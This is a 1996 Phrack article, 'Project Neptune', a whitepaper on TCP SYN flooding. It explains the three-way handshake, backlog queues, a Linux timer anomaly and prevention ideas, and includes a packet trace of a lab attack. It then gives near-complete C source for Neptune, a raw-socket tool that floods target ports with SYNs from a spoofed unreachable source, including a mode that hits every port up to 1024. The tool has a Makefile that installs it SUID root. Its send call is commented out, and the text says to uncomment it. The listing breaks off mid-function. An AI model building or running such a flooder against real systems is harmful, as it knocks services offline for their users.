==Phrack Magazine== Volume Seven, Issue Forty-Eight, File 13 of 18 [ Project Neptune ] by daemon9 / route / infinity for Phrack Magazine July 1996 Guild Productions, kid comments to route@infonexus.com This project is a comprehensive analysis of TCP SYN flooding. You may be wondering, why such a copious treatment of TCP SYN flooding? Apparently, someone had to do it. That someone turned out to be me (I need a real hobby). The SYNflood Project consists of this whitepaper, including anotated network monitor dumps and fully functional robust Linux sourcecode. --[ Introduction ]-- TCP SYN flooding is a denial of service (DOS) attack. Like most DOS attacks, it does not exploit a software bug, but rather a shortcoming in the implemenation of a particular protocol. For example, mail bombing DOS attacks work because most SMTP agents are dumb and will accept whatever is sent their way. ICMP_ECHO floods exploit the fact that most kernels will simply reply to ICMP_ECHO request packets one after another, ad inifintum. We will see that TCP SYN flood DOS attacks work because of the current implementation of TCP's connection establishment protocol. --[ Overview ]-- This whitepaper is intended as a complete introduction to TCP SYN flooding (refered to hereafter as SYN flooding). It will cover the attack in detail, including all relevant necessary background information. It is organized into sections: Section I. TCP Background Information Section II. TCP Memory Structures and the Backlog Section III. TCP Input Processing Section IV. The Attack Section V. Network Trace Section VI. Neptune.c Section VII. Discussion and Prevention Section VIII. References (Note that readers unfamiliar with the TCP/IP protocol suite may wish to first read ftp://ftp.infonexus.com/pub/Philes/NetTech/TCP-IP/tcipIp.intro.txt.gz) --[ The Players ]-- A: Target host X: Unreachable host Z: Attacking host Z(x): Attacker masquerading as the unreachable --[ The Figures ]-- There are a few network transaction figures in the paper and they are to be interpreted as per the following example: tick host a control host b tick: A unit of time. There is no distinction made as to *how* much time passes between ticks, just that time passes. It's generally not going to be a great deal. host a: A machine particpating in a TCP-based conversation. control: This field shows any relevant control bits set in the TCP header and the direction the data is flowing host b: A machine particpating in a TCP-based conversation. For example: 1 A ---SYN---> B In this case, at the first refrenced point in time, host a is sending a TCP segment to host b with the SYN bit on. Unless stated, we are generally not concerned with the data portion of the TCP segment. Section I. TCP Background Information TCP is a connection-oriented, reliable transport protocol. TCP is responsible for hiding network intricacies from the upper layers. A connection-oriented protcol implies that the two hosts participating in a discussion must first establish a connection before data may be exchanged. In TCP's case, this is done with the three-way handshake. Reliability can be provided in a number of ways, but the only two we are concerned with are data sequencing and acknowledgement. TCP assigns sequence numbers to every byte in every segment and acknowledges all data bytes recieved from the other end. (ACK's consume a sequence number, but are not themselves ACK'd. That would be ludicris.) --[ TCP Connection Establishment ]-- In order to exchange data using TCP, hosts must establish a connection. TCP establishes a connection in a 3 step process called the 3-way handshake. If machine A is running a client program and wishes to conect to a server program on machine B, the process is as follows: fig(1) 1 A ---SYN---> B 2 A <---SYN/ACK--- B 3 A ---ACK---> B At (1) the client is telling the server that it wants a connection. This is the SYN flag's only purpose. The client is telling the server that the sequence number field is valid, and should be checked. The client will set the sequence number field in the TCP header to it's ISN (initial sequence number). The server, upon receiving this segment (2) will respond with it's own ISN (therefore the SYN flag is on) and an ACKnowledgement of the clients first segment (which is the client's ISN+1). The client then ACK's the server's ISN (3). Now data transfer may take place. --[ TCP Control Flags ]-- There are six TCP control flags. We are only concerned with 3, but the others are included for posterity: *SYN: Synchronize Sequence Numbers The synchronize sequence numbers field is valid. This flag is only valid during the 3-way handshake. It tells the receiving TCP to check the sequence number field, and note it's value as the connection-initiator's (usually the client) initial sequence number. TCP sequence numbers can simply be thought of as 32-bit counters. They range from 0 to 4,294,967,295. Every byte of data exchanged across a TCP connection (along with certain flags) is sequenced. The sequence number field in the TCP header will contain the sequence number of the *first* byte of data in the TCP segment. *ACK: Acknowledgement The acknowledgement number field is valid. This flag is almost always set. The acknowledgement number field in the TCP header holds the value of the next *expected* sequence number (from the other side), and also acknowledges *all* data (from the other side) up through this ACK number minus one. *RST: Reset Destroy the referenced connection. All memory structures are torn down. URG: Urgent The urgent pointer is valid. This is TCP's way of implementing out of band (OOB) data. For instance, in a telnet connection a `ctrl-c` on the client side is considered urgent and will cause this flag to be set. PSH: Push The receiving TCP should not queue this data, but rather pass it to the application as soon as possible. This flag should always be set in interactive connections, such as telnet and rlogin. FIN: Finish The sending TCP is finished transmitting data, but is still open to accepting data. --[ Ports ]-- To grant simultaneous access to the TCP module, TCP provides a user interface called a port. Ports are used by the kernel to identify network processes. They are strictly transport layer entities. Together with an IP address, a TCP port provides provides an endpoint for network communications. In fact, at any given moment *all* Internet connections can be described by 4 numbers: the source IP address and source port and the destination IP address and destination port. Servers are bound to 'well-known' ports so that they may be located on a standard port on different systems. For example, the telnet daemon sits on TCP port 23. Section II. TCP Memory Structures and the Backlog For a copius treatment of the topic of SYN flooding, it is necessary to look at the memory structures that TCP creates when a client SYN arrives and the connection is pending (that is, a connection that is somewhere in the process of the three-way handshake and TCP is in the SYN_SENT or SYN_RVCD state). --[ BSD ]-- Under BSD style network code, for any given pending TCP connection there are three memory structures that are allocated (we do not discuss the process (proc) structure and file structure, but the reader should be aware that they exist as well.): Socket Structure (socket{}): Holds the information related to the local end of the communications link: protocol used, state information, addressing information, connection queues, buffers, and flags. Internet Protocol Control Block Structure (inpcb{}): PCB's are used at the transport layer by TCP (and UDP) to hold various pieces of information needed by TCP. They hold: TCP state information, IP address information, port numbers, IP header prototype and options and a pointer to the routing table entry for the destination address. PCB's are created for a given TCP based server when the server calls listen(), TCP Control Block Structure (tcpcb{}): The TCP control block contains TCP specific information such as timer information, sequence number information, flow control status, and OOB data. --[ Linux ]-- Linux uses a different scheme of memory allocation to hold network information. The socket structure is still used, but instead of the pcb{} and tcpcb{}, we have: Sock Structure (sock{}): Protocol specific information, most of the data structures are TCP related. This is a huge structure. SK Structure (sk_buff{}): Holds more protocol specific information including packet header information, also contains a sock{}. According to Alan Cox: The inode is the inode holding the socket (this may be a dummy inode for non file system sockets like IP), the socket holds generic high level methods and the struct sock is the protocol specific object, although all but a few experimental high performance items use the same generic struct sock and support code. That holds chains of linear buffers (struct sk_buff's). [ struct inode -> struct socket -> struct sock -> chains of sk_buff's ] --[ The Backlog Queue]-- These are large memory structures. Every time a client SYN arrives on a valid port (a port where a TCP server is listen()ing), they must be allocated. If there were no limit, a busy host could easily exhuast all of it's memory just trying to process TCP connections. (This would be an even simpler DOS attack.) However, there is an upper limit to amount of concurrent connection requests a given TCP can have outstanding for a given socket. This limit is the backlog and it is the length of the queue where incoming (as yet incomplete) connections are kept. This queue limit applies to both the number of imcomplete connections (the 3-way handshake has not been completed) and the number of completed connections that have not been pulled from the queue by the application by way of the accept() call. If this backlog limit is reached, we will see that TCP will silently discard all incoming connection requests until the pending connections can be dealt with. The backlog is not a large value. It does not have to be. Normally TCP is quite expedient in connection establishment processing. Even if a connection arrived while the queue was full, in all likelyhood, when the client retransmits it's connection request segment, the receiving TCP will have room again in it's queue. Different TCP implementations have different backlog sizes. Under BSD style networking code, there is also 'grace' margin of 3/2. That is, TCP will allow up to backlog*3/2+1 connections. This will allow a socket one connection even if it calls listen with a backlog of 0. Some common backlog values: fig(2) OS Backlog BL+Grace Notes --------------------------------------------------------------------------- SunOS 4.x.x: 5 8 IRIX 5.2: 5 8 Solaris Linux 1.2.x: 10 10 Linux does not have this grace margin. FreeBSD 2.1.0: 32 FreeBSD 2.1.5: 128 Win NTs 3.5.1: 6 6 NT does not appear to have this margin. Win NTw 4.0: 6 6 NT has a pathetic backlog. Section III. TCP Input Processing To see exactly where the attack works it is necessary to watch as the receiving TCP processes an incoming segment. The following is true for BSD style networking, and only processes relevant to this paper are discussed. A packet arrives and is demultiplexed up the protocol stack to TCP. The TCP state is LISTEN: Get header information: TCP retrieves the TCP and IP headers and stores the information in memory. Verify the TCP checksum: The standard Internet checksum is applied to the segment. If it fails, no ACK is sent, and the segment is dropped, assuming the client will retranmit it. Locate the PCB{}: TCP locates the pcb{} associated with the connection. If it is not found, TCP drops the segment and sends a RST. (Aside: This is how TCP handles connections that arrive on ports with no server listen()ing.) If the PCB{} exists, but the state is CLOSED, the server has not called connect() or listen(). The segment is dropped, but no RST is sent. The client is expected to retransmit it's connection request. We will see this occurence when we discuss the 'Linux Anomaly'. Create new socket: When a segment arrives for a listen()ing socket, a slave socket is created. This is where a socket{}, tcpcb{}, and another pcb{} are created. TCP is not committed to the connection at this point, so a flag is set to cause TCP to drop the socket (and destroy the memory structures) if an error is encountered. If the backlog limit is reached, TCP considers this an error, and the connection is refused. We will see that this is exactly why the attack works. Otherwise, the new socket's TCP state is LISTEN, and the completion of the passive open is attempted. Drop if RST, ACK, or no SYN: If the segment contains a RST, it is dropped. If it contains an ACK, it is dropped, a RST is sent and the memory structures torn down (the ACK makes no sense for the connection at this point, and is considered an error). If the segment does not have the SYN bit on, it is dropped. If the segment contains a SYN, processing continues. Address processing, etc: TCP then gets the clients address information into a buffer and connects it's pcb{} to the client, processes any TCP options, and initializes it's initial send sequence (ISS) number. ACK the SYN: TCP sends a SYN, ISS and an ACK to the client. The connection establishment timer is set for 75 seconds at this point. The state changes to SYN_RCVD. Now. TCP is commited to the socket. We will see that this is state the target TCP will be in when in the throes of the attack because the expected client response is never received. The state remains SYN_RCVD until the connection establishment timer expires, in which case the all the memory structures associated with the connection are destroyed, and the socket returns to the LISTEN state. Section IV. The Attack A TCP connection is initiated with a client issuing a request to a server with the SYN flag on in the TCP header. Normally the server will issue a SYN/ACK back to the client identified by the 32-bit source address in the IP header. The client will then send an ACK to the server (as we saw in figure 1 above) and data transfer can commence. When the client IP address is spoofed to be that of an unreachable, host, however, the targetted TCP cannot complete the 3-way handshake and will keep trying until it times out. That is the basis for the attack. The attacking host sends a few (we saw that as little as 6 is enough) SYN requests to the target TCP port (for example, the telnet daemon). The attacking host also must make sure that the source IP-address is spoofed to be that of another, currently unreachable host (the target TCP will be sending it's response to this address). IP (by way of ICMP) will inform TCP that the host is unreachable, but TCP considers these errors to be transient and leaves the resolution of them up to IP (reroute the packets, etc) effectively ignoring them. The IP-address must be unreachable because the attacker does not want *any* host to recieve the SYN/ACKs that will be coming from the target TCP, which would elicit a RST from that host (as we saw in TCP input above). This would foil the attack. The process is as follows: fig(3) 1 Z(x) ---SYN---> A Z(x) ---SYN---> A Z(x) ---SYN---> A Z(x) ---SYN---> A Z(x) ---SYN---> A Z(x) ---SYN---> A 2 X <---SYN/ACK--- A X <---SYN/ACK--- A ... 3 X <---RST--- A At (1) the attacking host sends a multitude of SYN requests to the target to fill it's backlog queue with pending connections. (2) The target responds with SYN/ACKs to what it believes is the source of the incoming SYNs. During this time all further requests to this TCP port will be ignored. The target port is flooded. --[ Linux Anomaly ]-- In doing my research for this project, I noticed a very strange implementation error in the TCP module of Linux. When a particular TCP server is flooded on a Linux host, strange things are afoot... First, it appears that the connection-establishment timer is broken. The 10 spoofed connection-requests keep the sockets in the SYN_RCVD state for just over 20 minutes (23 minutesto be exact. Wonder what the signifigance of this is... Hmmm...). Much longer than the 75-seconds it *should* be. The next oddity is even more odd... After that seemingly arbitrary time period (I have to determine what the hell is going on there), TCP moves the flooded sockets into the CLOSE state, where they *stay* until a connection-request arrives on a *different* port. If a connection-request arrives on the flooded port (now in the CLOSE state), it will not answer, acting as if it is still flooded. After the connection-request arrives on a different port, the CLOSEd sockets will be destroyed, and the original flooded port will be free to answer requests again. It seems as though the connection-request will spark the CLOSEd sockets into calling listen()... Damn wierd if you ask me... The implications of this are severe. I have been able to completely disable all TCP based servers from answering requests indefinitely. If all the TCP servers are flooded, there are none to recieve the valid connection request to alleviate the CLOSE state from the flooded connections. Bad news indeed. [Note: as of 7.15.96 this is a conundrum. I have contacted Alan Cox and Eric Schenk and plan to work with them on a solution to this problem. I be forthcoming with all our findings as soon as possible. I believe the problem to perhaps lie (at least in part) in the tcp_close_pending() function... Or perhaps there is a logic error in how TCP switches between the connection-establishment timer and the keep-alive timer. They are both implemented using the same variable since they are mutally exclusive...] Section V. Network Trace The following is a network trace from an actual SYN flooding session. The target machine is Ash, a Linux 1.2.13 box. The attacker is Onyx. The network is a 10Mbps ethernet. Network Monitor trace Fri 07/12/96 10:23:34 Flood1.TXT Frame Time Src MAC Addr Dst MAC Addr Protocol Description Src Other Addr Dst Other Addr Type Other Addr 1 2.519 onyx ash TCP/23 ....S., len: 4, seq:3580643269, ack:1380647758, win: 512, src 192.168.2.2 192.168.2.7 IP 2 2.520 ash onyx TCP/1510 .A..S., len: 4, seq: 659642873, ack:3580643270, win:14335, src 192.168.2.7 192.168.2.2 IP 3 2.520 onyx ash TCP/23 .A...., len: 0, seq:3580643270, ack: 659642874, win:14260, src 192.168.2.2 192.168.2.7 IP A telnet client is started on Onyx, and we see the standard 3-way handshake between the two hosts for the telnet session. Lines 4-126 were interactive telnet traffic and added nothing to the discussion. 127 12.804 ash onyx TCP/1510 .A...F, len: 0, seq: 659643408, ack:3580643401, win:14335, src 192.168.2.7 192.168.2.2 IP 128 12.804 onyx ash TCP/23 .A...., len: 0, seq:3580643401, ack: 659643409, win:14322, src 192.168.2.2 192.168.2.7 IP 129 12.805 onyx ash TCP/23 .A...F, len: 0, seq:3580643401, ack: 659643409, win:14335, src 192.168.2.2 192.168.2.7 IP 130 12.805 ash onyx TCP/1510 .A...., len: 0, seq: 659643409, ack:3580643402, win:14334, src 192.168.2.7 192.168.2.2 IP Here we see the 4-way connection termination procedure. At this point, the flood program is started on onyx, the information filled in, and the attack is launched. 131 42.251 onyx *BROADCAST ARP_RARP ARP: Request, Target IP: 192.168.2.7 Onyx is attempting to get ash's ethernet address using ARP. 132 42.251 ash onyx ARP_RARP ARP: Reply, Target IP: 192.168.2.2 Target Hdwr Addr: 0020AF2311D7 Ash responds with it's ethernet address. 133 42.252 onyx ash TCP/23 ....S., len: 0, seq:3364942082, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP The flood begins. Onyx sends the first of 10 TCP segments with the SYN bit on, and the IP address spoofed to the telnet daemon. 134 42.252 ash *BROADCAST ARP_RARP ARP: Request, Target IP: 192.168.2.10 Ash immediately attempts to resolve the ethernet address. However, since there is no such host on the network (and no router to proxy the request with) the ARP request will not be answered. The host, is in effect, unreachable. 135 42.271 onyx ash TCP/23 ....S., len: 0, seq:3381719298, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP 136 42.291 onyx ash TCP/23 ....S., len: 0, seq:3398496514, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP 137 42.311 onyx ash TCP/23 ....S., len: 0, seq:3415273730, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP 138 42.331 onyx ash TCP/23 ....S., len: 0, seq:3432050946, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP 139 42.351 onyx ash TCP/23 ....S., len: 0, seq:3448828162, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP 140 42.371 onyx ash TCP/23 ....S., len: 0, seq:3465605378, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP 141 42.391 onyx ash TCP/23 ....S., len: 0, seq:3482382594, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP 142 42.411 onyx ash TCP/23 ....S., len: 0, seq:3499159810, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP 143 42.431 onyx ash TCP/23 ....S., len: 0, seq:3515937026, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP The next 9 of 10 SYNs. The telnet daemon on ash is now flooded. At this point, another telnet client is started on Onyx. 144 47.227 onyx *BROADCAST ARP_RARP ARP: Request, Target IP: 192.168.2.7 Onyx is again attempting to get ash's ethernet address using ARP. Hmmm, this entry should be in the arp cache. I should look into this. 145 47.228 ash onyx ARP_RARP ARP: Reply, Target IP: 192.168.2.2 Target Hdwr Addr: 0020AF2311D7 Here is the ARP reply. 146 47.228 onyx ash TCP/23 ....S., len: 4, seq:3625358638, ack: 0, win: 512, src 192.168.2.2 192.168.2.7 IP 147 50.230 onyx ash TCP/23 ....S., len: 4, seq:3625358638, ack: 0, win:14335, src 192.168.2.2 192.168.2.7 IP 148 56.239 onyx ash TCP/23 ....S., len: 4, seq:3625358638, ack: 0, win:14335, src 192.168.2.2 192.168.2.7 IP Onyx is attempting to establish a connection with the telnet daemon on Ash, which is, as we saw, flooded. 149 67.251 ash *BROADCAST ARP_RARP ARP: Request, Target IP: 192.168.2.10 Ash is still trying to get the ethernet address of the spoofed host. In vain... 150 68.247 onyx ash TCP/23 ....S., len: 4, seq:3625358638, ack: 0, win:14335, src 192.168.2.2 192.168.2.7 IP 151 92.254 onyx ash TCP/23 ....S., len: 4, seq:3625358638, ack: 0, win:14335, src 192.168.2.2 192.168.2.7 IP Onyx is still transmitting it's connection-estabishment requests... Also in vain. 152 92.258 ash *BROADCAST ARP_RARP ARP: Request, Target IP: 192.168.2.10 Hello? Are you out there? Section VI. Neptune.c Neptune.c is the companion code. It does everything we've talked about, and more. Neptune.c is admittedly more complex than it needs to be. I included several features that are not essential, but make the program more robust. The program features: simple to use menuing system, an alternative command line interface for easy integration into scripts, ICMP_ECHO requesting to query if unreachable is in fact unreachable (AKA 'ping'ing), infinity mode (read the code) and a daemon mode with (psuedo) random unreachable IP address choosing. The menu is really self explanatory... 1 Enter target host Enter yur target. If you are confused at this point, kill yurself. 2 Enter source (unreachable) host Enter the puported sender. It is integral that this host be routable but not reachable. Remember that the address must be a unicast address. If it is a broadcast or multicast address it will be dropped by the target TCP. 3 Send ICMP_ECHO(s) to unreachable Make sure that yur puported sender is in fact unreachable. This is not 100% reliable as A) ICMP packets can be dropped by the unreliable network layer, B) the host may filter out ICMP_ECHO packets. 4 Enter port number to flood The target port to flood. There is an infinity switch. 5 Enter number of SYNs The number of SYNs to send. Remember, this attack is not bandwidth hungry, sending more packets than neccessary is totally useless. 6 Quit Bye, bye. 7 Lanuch Fire when ready. 8 Daemonize (may or may not be implemented in yur version) Puts the program in dameon mode. It forks to the background and does it's evilness there. Needs two more options: packet sending interval, and time for daemon to live. Recommended packet sending interval is at least every 90 seconds, depending on the target TCP. 80 should work fine, as the connection establishment timer is 75 seconds. Daemon lifetime is up to you. Be kind. Also the daemon portion includes routines to optionally make use of a file of unreachable IP addresses and (pseudo) randomly choose from them. The program reads the file and builds a dynamic array of these IP addresses in network byte order and then uses rand (seeded from the time of day in seconds --we don't need alot of entropy here, this isn't cryptography--) to generate a number and then it mods that number by the number of entries in the table to hash to a particular IP address. Since the program opens raw sockets, it needs to run as root. By default, it is installed SUID root in /usr/local/bin/neptune with the access list in /etc/sfaccess.conf. The authentication mechanism works by checking the usernames (via UID) of the attempted flooders. It is not a complex algorithm, and in fact the code is quite simple (asside: If anyone can find any security problems with the program being SUID root, --above the fact that the program is admittedly evil-- I would love to hear about them). Root is the only entry the access file starts off with. For the program to work, you need to remove the comment marks from line 318 (the actual sendto() call where the forged datagrams are sent). I did that so the fools simply interested in causing trouble (and not interested in learning) would find the program mostly useless. Section VII. Discussion and Prevention As we have seen, the attack works because TCP is attempting to do it's job of providing a reliable transport. TCP must establish a connection first, and this is where the weakness lies. (T/TCP is immune to this attack via TAO. See my future paper: `The Next Generation Internet` for information on T/TCP and IPng.) Under normal circumstances, assuming well-behaved networking software, the worst that can happen is a TCP-based server may be wrapped up in legimate connection-establishment processing and a few clients may have to retransmit thier SYNs. But, a misbegotten client program can exploit this connection-establishment weakness and down a TCP-based server with only a few doctored segments. The fact that SYN flooding requires such a small amount of network traffic to be so effective is important to note. Consider other network DOS attacks such as ICMP_ECHO floods (ping floods), mail bombs, mass mailing list subscriptions, etc... To be effective, all of these attacks require an attacker to transmit volumous amounts of network traffic. Not only does this make these attacks more noticable on both ends by decreasing the amount of available bandwidth (as such, often these attacks are waged from compromised machines) but it also adds to the general traffic problems of the Internet. SYN flooding can be deadly effective with as little as 360 packets/hour. --[ Prevention ]-- Ok, so how do we stop it? Good question. --[ TCPd ]-- TCP wrappers are almost useless. The magic they do is based on the validity of the source IP-address of incoming datagrams. As we know, this can be spoofed to whatever the attacker desires. Unless the target has denied traffic from *everywhere* except known hosts, TCP wrappers will not save you. --[ Increase the Backlog ]-- Increasing the default backlog is not much of a solution. In comparision with the difficulty of an attacker simply sending more packets, the memory requirements of the additional connection-establishment structures is prohibitively expensive. At best it is an obfuscative (word check...?) measure. --[ Packet Filtering ]-- A smart packet filter (or kernel modification) of some kind may be a viable solution. Briefly: - Host keeps a recent log of incoming packets with the `SYN` bit on in a linked list structure. - The linked list cannot be permitted to grow without bound (another DOS attack would present itself) - When x amount of SYNs are received on a socket, certain characteristics about the packets are compared, (Source port, source IP address, sequence numbers, window size, etc) and if things seem fishy, the connection requests and associated memory structures are immediately destroyed. Section VIII. References Ppl: A. Cox, R. Stevens Books: TCP Illustrated vols II,III This project made possible by a grant from the Guild Corporation. EOF ------------------------8<-------------------------------------------- # Neptune Makefile # daemon9, 1996 Guild Productions all: @gcc -o neptune neptune.c @echo "" @echo "'make install' will install the program..." @echo "" @echo "Warning! Neptune is installed SUID root by default!" @echo "" @echo "route@infonexus.com / Guild Corporation" install: strip ./neptune mv ./neptune /usr/local/bin/neptune chmod 4755 /usr/local/bin/neptune @echo "root" > /etc/sfaccess.conf @echo "Installation complete, access list is /etc/sfaccess.conf" clean: @rm -f *.o neptune /etc/sfaccess.conf ------------------------8<-------------------------------------------- /* Neptune v. 1.5 daemon9/route/infinity June 1996 Guild productions comments to daemon9@netcom.com If you found this code alone, without the companion whitepaper please get the real-deal: ftp.infonexus.com/pub/SourceAndShell/Guild/Route/Projects/Neptune/neptune.tgz Brief synopsis: Floods the target host with TCP segments with the SYN bit on, puportedly from an unreachable host. The return address in the IP header is forged to be that of a known unreachable host. The attacked TCP, if flooded sufficently, will be unable to respond to futher connects. See the accompanying whitepaper for a full treatment of the topic. (Also see my paper on IP-spoofing for information on a related subject.) Usage: Figure it out, kid. Menu is default action. Command line usage is available for easy integration into shell scripts. If you can't figure out an unreachable host, the program will not work. Gripes: It would appear that flooding a host on every port (with the infinity switch) has it's drawbacks. So many packets are trying to make their way to the target host, it seems as though many are dropped, especially on ethernets. Across the Internet, though, the problem appears mostly mitigated. The call to usleep appears to fix this... Coming up is a port scanning option that will find open ports... Version History: 6/17/96 beta1: SYN flooding, Cmd line and crude menu, ICMP stuff broken 6/20/96 beta2: Better menu, improved SYN flooding, ICMP fixed... sorta 6/21/96 beta3: Better menu still, fixed SYN flood clogging problem Fixed some name-lookup problems 6/22/96 beta4: Some loop optimization, ICMP socket stuff changed, ICMP code fixed 6/23/96 1.0: First real version... 6/25/96 1.1: Cleaned up some stuff, added authentication hooks, fixed up input routine stuff 7/01/96 1.5: Added daemonizing routine... This coding project made possible by a grant from the Guild corporation */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <syslog.h> #include <pwd.h> #include <unistd.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <fcntl.h> #include <time.h> #include <linux/signal.h> #include <linux/ip.h> #include <linux/tcp.h> #include <linux/icmp.h> #define BUFLEN 256 #define MENUBUF 64 #define MAXPORT 1024 #define MAXPAK 4096 #define MENUSLEEP 700000 #define FLOODSLEEP 100 /* Ethernet, or WAN? Yur mileage will vary.*/ #define ICMPSLEEP 100 #define ACCESSLIST "/etc/sfaccess.conf" int HANDLERCODE=1; int KEEPQUIET=0; char werd[]={"\nThis code made possible by a grant from the Guild Corporation\n\0"}; void main(argc,argv) int argc; char *argv[]; { void usage(char *); void menu(int,char *); void flood(int,unsigned,unsigned,u_short,int); unsigned nameResolve(char *); int authenticate(int,char *); unsigned unreachable,target; int c,port,amount,sock1,fd; struct passwd *passEnt; char t[20],u[20]; if((fd=open(ACCESSLIST,O_RDONLY))<=0){ perror("Cannot open accesslist"); exit(1); } setpwent(); passEnt=getpwuid(getuid()); endpwent(); /* Authenticate */ if(!authenticate(fd,passEnt->pw_name)){ fprintf(stderr,"Access Denied, kid\n"); exit(0); } /* Open up a RAW socket */ if((sock1=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){ perror("\nHmmm.... socket problems\n"); exit(1); } if(argc==1){ menu(sock1,passEnt->pw_name); exit(0); } /* Parse command-line arguments */ while((c=getopt(argc,argv,"8:s:t:p:a"))){ switch(c){ case 's': /* Source (spoofed) host */ unreachable=nameResolve(optarg); strcpy(u,optarg); break; case 't': /* Target host */ target=nameResolve(optarg); strcpy(t,optarg); break; case 'p': /* Target port */ port=atoi(optarg); break; case '8': /* infinity switch */ port=0; break; case 'a': /* Amount of SYNs to send */ amount=atoi(optarg); break; default: /* WTF? */ usage(argv[0]); } } if(!port){ printf("\n\nFlooding target: \t\t%u\nOn ports\t\t\t1-%d\nAmount: \t\t\t%u\nPuportedly from: \t\t%u \n",target,MAXPORT,amount,unreachable); flood(sock1,unreachable,target,0,amount); } else{ printf("\n\nFlooding target: \t\t%u\nOn port: \t\t\t%u\nAmount: \t\t\t%u\nPuportedly from: \t\t%u \n",target,port,amount,unreachable); flood(sock1,unreachable,target,port,amount); } syslog(LOG_LOCAL6|LOG_INFO,"FLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d\n",getpid(),passEnt->pw_name,t,u,port,amount); printf(werd); exit(0); } /* End main */ /* * Authenticate. Makes sure user is authorized to run program. * */ int authenticate(fd,nameID) int fd; char *nameID; { char buf[BUFLEN+1]; char workBuffer[10]; int i=0,j=0; while(read(fd,buf,sizeof(buf))){ if(!(strstr(buf,nameID))){ close(fd); syslog(LOG_LOCAL6|LOG_INFO,"Failed authentication for %s\n",nameID); return(0); } else { close(fd); syslog(LOG_LOCAL6|LOG_INFO,"Successful start by %s, PID: %d\n",nameID,getpid()); return(1); } } } /* * Flood. This is main workhorse of the program. IP and TCP header * construction occurs here, as does flooding. */ void flood(int sock,unsigned sadd,unsigned dadd,u_short dport,int amount){ unsigned short in_cksum(unsigned short *,int); struct packet{ struct iphdr ip; struct tcphdr tcp; }packet; struct pseudo_header{ /* For TCP header checksum */ unsigned int source_address; unsigned int dest_address; unsigned char placeholder; unsigned char protocol; unsigned short tcp_length; struct tcphdr tcp; }pseudo_header; struct sockaddr_in sin; /* IP address information */ register int i=0,j=0; /* Counters */ int tsunami=0; /* flag */ unsigned short sport=161+getpid(); if(!dport){ tsunami++; /* GOD save them... */ fprintf(stderr,"\nTSUNAMI!\n"); fprintf(stderr,"\nflooding port:"); } /* Setup the sin struct with addressing information */ sin.sin_family=AF_INET; /* Internet address family */ sin.sin_port=sport; /* Source port */ sin.sin_addr.s_addr=dadd; /* Dest. address */ /* Packet assembly begins here */ /* Fill in all the TCP header information */ packet.tcp.source=sport; /* 16-bit Source port number */ packet.tcp.dest=htons(dport); /* 16-bit Destination port */ packet.tcp.seq=49358353+getpid(); /* 32-bit Sequence Number */ packet.tcp.ack_seq=0; /* 32-bit Acknowledgement Number */ packet.tcp.doff=5; /* Data offset */ packet.tcp.res1=0; /* reserved */ packet.tcp.res2=0; /* reserved */ packet.tcp.urg=0; /* Urgent offset valid flag */ packet.tcp.ack=0; /* Acknowledgement field valid flag */ packet.tcp.psh=0; /* Push flag */ packet.tcp.rst=0; /* Reset flag */ packet.tcp.syn=1; /* Synchronize sequence numbers flag */ packet.tcp.fin=0; /* Finish sending flag */ packet.tcp.window=htons(242); /* 16-bit Window size */ packet.tcp.check=0; /* 16-bit checksum (to be filled in below) */ packet.tcp.urg_ptr=0; /* 16-bit urgent offset */ /* Fill in all the IP header information */ packet.ip.version=4; /* 4-bit Version */ packet.ip.ihl=5; /* 4-bit Header Length */ packet.ip.tos=0; /* 8-bit Type of service */ packet.ip.tot_len=htons(40); /* 16-bit Total length */ packet.ip.id=getpid(); /* 16-bit ID field */ packet.ip.frag_off=0; /* 13-bit Fragment offset */ packet.ip.ttl=255; /* 8-bit Time To Live */ packet.ip.protocol=IPPROTO_TCP; /* 8-bit Protocol */ packet.ip.check=0; /* 16-bit Header checksum (filled in below) */ packet.ip.saddr=sadd; /* 32-bit Source Address */ packet.ip.daddr=dadd; /* 32-bit Destination Address */ /* Psuedo-headers needed for TCP hdr checksum (they do not change and do not need to be in the loop) */ pseudo_header.source_address=packet.ip.saddr; pseudo_header.dest_address=packet.ip.daddr; pseudo_header.placeholder=0; pseudo_header.protocol=IPPROTO_TCP; pseudo_header.tcp_length=htons(20); while(1){ /* Main loop */ if(tsunami){ if(j==MAXPORT){ tsunami=0; break; } packet.tcp.dest=htons(++j); fprintf(stderr,"%d",j); fprintf(stderr,"%c",0x08); if(j>=10)fprintf(stderr,"%c",0x08); if(j>=100)fprintf(stderr,"%c",0x08); if(j>=1000)fprintf(stderr,"%c",0x08); if(j>=10000)fprintf(stderr,"%c",0x08); } for(i=0;i<amount;i++){ /* Flood loop */ /* Certian header fields should change */ packet.tcp.source++; /* Source port inc */ packet.tcp.seq++; /* Sequence Number inc */ packet.tcp.check=0; /* Checksum will need to change */ packet.ip.id++; /* ID number */ packet.ip.check=0; /* Checksum will need to change */ /* IP header checksum */ packet.ip.check=in_cksum((unsigned short *)&packet.ip,20); /* Setup TCP headers for checksum */ bcopy((char *)&packet.tcp,(char *)&pseudo_header.tcp,20); /* TCP header checksum */ packet.tcp.check=in_cksum((unsigned short *)&pseudo_header,32); /* As it turns out, if we blast packets too fast, many get dropped, as the receiving kernel can't cope (at least on an ethernet). This value could be tweaked prolly, but that's up to you for now... */ usleep(FLOODSLEEP); /* This is where we sit back and watch it all come together */ /*sendto(sock,&packet,40,0,(struct sockaddr *)&sin,sizeof(sin));*/ if(!tsunami&&!KEEPQUIET)fprintf(stderr,"."); } if(!tsunami)break; } } /* * IP Family checksum routine (from UNP) */ unsigned short in_cksum(unsigned short *ptr,int nbytes){ register long sum; /* assumes long == 32 bits */ u_short oddbyte; register u_short answer; /* assumes u_short == 16 bits */ /* * Our algorithm is simple, using a 32-bit accumulator (sum), * we add sequential 16-bit words to it, and at the end, fold back * all the carry bits from the top 16 bits into the lower 16 bits. */ sum = 0; 